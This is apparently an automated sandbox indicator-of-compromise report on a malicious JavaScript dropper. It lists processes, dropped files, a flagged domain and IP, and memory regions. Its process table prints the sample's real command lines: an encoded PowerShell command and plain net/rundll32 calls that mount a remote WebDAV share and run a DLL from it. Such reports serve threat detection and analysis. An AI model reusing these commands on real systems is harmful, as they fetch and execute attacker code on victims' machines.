IOC Report
2251913620121805788.js

loading gif

Files

File Path
Type
Category
Malicious
2251913620121805788.js
ASCII text, with very long lines (65536), with no line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1wr300rc.tpj.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qyr1crwa.xev.ps1
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2251913620121805788.js"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAzADEAMQA3ADAAMQAzADUANwA1ADEAMgA1ADUALgBkAGwAbAAsAEUAbgB0AHIAeQA=
malicious
C:\Windows\System32\rundll32.exe
"C:\Windows\system32\rundll32.exe" \\apitestlabs.com@8888\davwwwroot\31170135751255.dll,Entry
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\net.exe
"C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\

URLs

Name
IP
Malicious
http://apitestlabs.com:8888/
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://apitestlabs.com:8888/d
unknown
http://apitestlabs.com:8888/em
unknown

Domains

Name
IP
Malicious
apitestlabs.com
94.159.113.48
malicious
198.187.3.20.in-addr.arpa
unknown
malicious

IPs

IP
Domain
Country
Malicious
94.159.113.48
apitestlabs.com
Russian Federation
malicious

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
JScriptSetScriptStateStarted

Memdumps

Base Address
Regiontype
Protect
Malicious
AA09EFE000
stack
page read and write
1FD696A6000
heap
page read and write
1FD69699000
heap
page read and write
680357E000
stack
page read and write
1D0E1D44000
heap
page read and write
1FD514D1000
trusted library allocation
page read and write
19123248000
heap
page read and write
23CB7650000
remote allocation
page read and write
9F7A71F000
stack
page read and write
1912322D000
heap
page read and write
19123493000
heap
page read and write
1D0E1AC0000
heap
page read and write
1FD518B6000
trusted library allocation
page read and write
1D0E1ADF000
heap
page read and write
1FD50FC0000
trusted library allocation
page read and write
1FD515EF000
trusted library allocation
page read and write
23CB7650000
remote allocation
page read and write
1FD4F599000
heap
page read and write
1FD51470000
heap
page execute and read and write
7FFB4AA02000
trusted library allocation
page read and write
DDDEFE000
stack
page read and write
DDE1FB000
stack
page read and write
191237B0000
heap
page read and write
1912340F000
heap
page read and write
19123223000
heap
page read and write
7FFB4ACD0000
trusted library allocation
page read and write
1912340F000
heap
page read and write
1D0E1B00000
heap
page read and write
1D0E1ADB000
heap
page read and write
19121421000
heap
page read and write
1FD515EC000
trusted library allocation
page read and write
1D0E1AEE000
heap
page read and write
19123417000
heap
page read and write
7FFB4AD00000
trusted library allocation
page read and write
68039FE000
stack
page read and write
1FD69633000
heap
page read and write
1FD514F3000
trusted library allocation
page read and write
1FD4F650000
heap
page read and write
19123226000
heap
page read and write
1912322B000
heap
page read and write
1FD5195A000
trusted library allocation
page read and write
1FD697C0000
heap
page read and write
1912143D000
heap
page read and write
19123231000
heap
page read and write
19123246000
heap
page read and write
1D0E1AE0000
heap
page read and write
1FD69611000
heap
page read and write
DDD6F4000
stack
page read and write
19121449000
heap
page read and write
191213AA000
heap
page read and write
1FD69720000
heap
page execute and read and write
7FFB4AC70000
trusted library allocation
page read and write
DDDBFF000
stack
page read and write
19121645000
heap
page read and write
1FD516E9000
trusted library allocation
page read and write
19121434000
heap
page read and write
1FD69990000
heap
page read and write
1D0E18E0000
heap
page read and write
1FD5197D000
trusted library allocation
page read and write
9F7A79D000
stack
page read and write
7FFB4AAB0000
trusted library allocation
page read and write
1FD614DF000
trusted library allocation
page read and write
19121640000
heap
page read and write
1FD515DB000
trusted library allocation
page read and write
7FFB4ABE2000
trusted library allocation
page read and write
19123421000
heap
page read and write
1FD6967D000
heap
page read and write
9F7AA7F000
stack
page read and write
7FFB4AC50000
trusted library allocation
page read and write
1912323F000
heap
page read and write
19123272000
heap
page read and write
19121421000
heap
page read and write
DDDCFF000
stack
page read and write
23CB759A000
heap
page read and write
23CB75A7000
heap
page read and write
6803BFB000
stack
page read and write
1912323D000
heap
page read and write
1D0E1A70000
heap
page read and write
1FD51010000
heap
page read and write
1FD6961D000
heap
page read and write
1FD51A08000
trusted library allocation
page read and write
6803877000
stack
page read and write
1D0E1D40000
heap
page read and write
1D0E1D4B000
heap
page read and write
191213AB000
heap
page read and write
1912322F000
heap
page read and write
23CB7575000
heap
page read and write
19123320000
heap
page read and write
1D0E1ADB000
heap
page read and write
1912324D000
heap
page read and write
1FD69726000
heap
page execute and read and write
23CB7594000
heap
page read and write
7FFB4ABD0000
trusted library allocation
page execute and read and write
1FD695E0000
heap
page read and write
7FFB4ABF0000
trusted library allocation
page execute and read and write
7FFB4AA03000
trusted library allocation
page execute and read and write
1912144A000
heap
page read and write
23CB7567000
heap
page read and write
19123225000
heap
page read and write
1912323B000
heap
page read and write
7FFB4ABC0000
trusted library allocation
page execute and read and write
19123223000
heap
page read and write
1FD515DE000
trusted library allocation
page read and write
7FFB4AB20000
trusted library allocation
page execute and read and write
1912337E000
heap
page read and write
1912341C000
heap
page read and write
23CB7650000
remote allocation
page read and write
1D0E1AB3000
heap
page read and write
23CB757A000
heap
page read and write
19123419000
heap
page read and write
23CB7573000
heap
page read and write
7FFB4ACF0000
trusted library allocation
page read and write
1FD4F5DA000
heap
page read and write
7FFB4AC40000
trusted library allocation
page read and write
19121380000
heap
page read and write
1D0E1AEC000
heap
page read and write
19123230000
heap
page read and write
7FFB4ACA0000
trusted library allocation
page read and write
19123321000
heap
page read and write
1FD4F570000
heap
page read and write
19123227000
heap
page read and write
68031CE000
stack
page read and write
23CB7594000
heap
page read and write
1FD4F591000
heap
page read and write
6803A7E000
stack
page read and write
1FD4F64C000
heap
page read and write
7FFB4AAE6000
trusted library allocation
page execute and read and write
7FFB4ABBA000
trusted library allocation
page read and write
1D0E5540000
heap
page read and write
19121455000
heap
page read and write
68037F8000
stack
page read and write
19123233000
heap
page read and write
1FD4F5B1000
heap
page read and write
23CB756B000
heap
page read and write
7FFB4AA10000
trusted library allocation
page read and write
7FFB4ABB1000
trusted library allocation
page read and write
19123242000
heap
page read and write
7FFB4AABC000
trusted library allocation
page execute and read and write
7FFB4ACE0000
trusted library allocation
page read and write
6803979000
stack
page read and write
7FFB4ACC0000
trusted library allocation
page read and write
7DF4AEC80000
trusted library allocation
page execute and read and write
7FFB4AAC0000
trusted library allocation
page execute and read and write
68038F8000
stack
page read and write
680318E000
stack
page read and write
1FD4F557000
heap
page read and write
1FD515E1000
trusted library allocation
page read and write
7FFB4AAB6000
trusted library allocation
page read and write
1D0E1AC8000
heap
page read and write
23CB7573000
heap
page read and write
1FD4F5DF000
heap
page read and write
1FD51015000
heap
page read and write
1FD61542000
trusted library allocation
page read and write
AA09FFB000
stack
page read and write
7FFB4AA0D000
trusted library allocation
page execute and read and write
23CB7550000
heap
page read and write
6803103000
stack
page read and write
DDDAFE000
stack
page read and write
23CB77B0000
heap
page read and write
1D0E1B08000
heap
page read and write
23CB7540000
heap
page read and write
191213B1000
heap
page read and write
7FFB4AC90000
trusted library allocation
page read and write
1D0E4D40000
trusted library allocation
page read and write
1912323C000
heap
page read and write
19121340000
heap
page read and write
AA09BFB000
stack
page read and write
1FD518B0000
trusted library allocation
page read and write
6803B7E000
stack
page read and write
191213C3000
heap
page read and write
19121310000
heap
page read and write
7FFB4AD20000
trusted library allocation
page read and write
19121455000
heap
page read and write
23CB77B4000
heap
page read and write
1912341B000
heap
page read and write
23CB7548000
heap
page read and write
19123256000
heap
page read and write
19123282000
heap
page read and write
1FD519D8000
trusted library allocation
page read and write
1D0E19E0000
heap
page read and write
1912144A000
heap
page read and write
7FFB4AD10000
trusted library allocation
page read and write
1D0E1AE4000
heap
page read and write
1912143E000
heap
page read and write
AA09E7E000
stack
page read and write
23CB757A000
heap
page read and write
DDD7FE000
stack
page read and write
1FD51560000
trusted library allocation
page read and write
19123242000
heap
page read and write
191213B1000
heap
page read and write
680377E000
stack
page read and write
1D0E1AF3000
heap
page read and write
1FD50FB0000
heap
page readonly
19121560000
heap
page read and write
1FD4F730000
heap
page read and write
1FD515F2000
trusted library allocation
page read and write
19121455000
heap
page read and write
DDDDFF000
stack
page read and write
1FD4F550000
heap
page read and write
68035FC000
stack
page read and write
1FD4F5D8000
heap
page read and write
1FD51630000
trusted library allocation
page read and write
19121437000
heap
page read and write
68034FE000
stack
page read and write
7FFB4AC60000
trusted library allocation
page read and write
7FFB4AC10000
trusted library allocation
page read and write
AA09F7D000
stack
page read and write
1D0E1AB0000
heap
page read and write
19121455000
heap
page read and write
1FD51410000
heap
page execute and read and write
1FD4F750000
heap
page read and write
1D0E1ACE000
heap
page read and write
19121455000
heap
page read and write
1912143A000
heap
page read and write
1912144A000
heap
page read and write
1D0E19C0000
heap
page read and write
23CB7500000
heap
page read and write
1FD51533000
trusted library allocation
page read and write
1912340F000
heap
page read and write
19123242000
heap
page read and write
23CB74E0000
heap
page read and write
19123420000
heap
page read and write
1FD614D1000
trusted library allocation
page read and write
19121441000
heap
page read and write
19121442000
heap
page read and write
19121455000
heap
page read and write
1FD51629000
trusted library allocation
page read and write
23CB759D000
heap
page read and write
68036FE000
stack
page read and write
1FD50F80000
trusted library allocation
page read and write
1FD50FA0000
trusted library allocation
page read and write
1FD515D8000
trusted library allocation
page read and write
1FD6961B000
heap
page read and write
1FD4F7A5000
heap
page read and write
1FD696AD000
heap
page read and write
23CB756B000
heap
page read and write
680347F000
stack
page read and write
1912322B000
heap
page read and write
19121320000
heap
page read and write
7FFB4AC20000
trusted library allocation
page read and write
68038FE000
stack
page read and write
1912322B000
heap
page read and write
19123220000
heap
page read and write
7FFB4AA04000
trusted library allocation
page read and write
1FD514EB000
trusted library allocation
page read and write
19123494000
heap
page read and write
1FD514C0000
heap
page read and write
19123241000
heap
page read and write
DDDFFD000
stack
page read and write
23CB7400000
heap
page read and write
1912324A000
heap
page read and write
7FFB4AC00000
trusted library allocation
page read and write
19123265000
heap
page read and write
7FFB4AC30000
trusted library allocation
page read and write
7FFB4ACB0000
trusted library allocation
page read and write
191213B0000
heap
page read and write
1FD515E4000
trusted library allocation
page read and write
1FD50F50000
heap
page read and write
23CB75A7000
heap
page read and write
DDD8FE000
stack
page read and write
7FFB4ABA0000
trusted library allocation
page read and write
7FFB4AC80000
trusted library allocation
page read and write
9F7A69A000
stack
page read and write
19123241000
heap
page read and write
191213AB000
heap
page read and write
19121455000
heap
page read and write
19123262000
heap
page read and write
19121439000
heap
page read and write
1FD4F7A0000
heap
page read and write
680367F000
stack
page read and write
There are 260 hidden memdumps, click here to show them.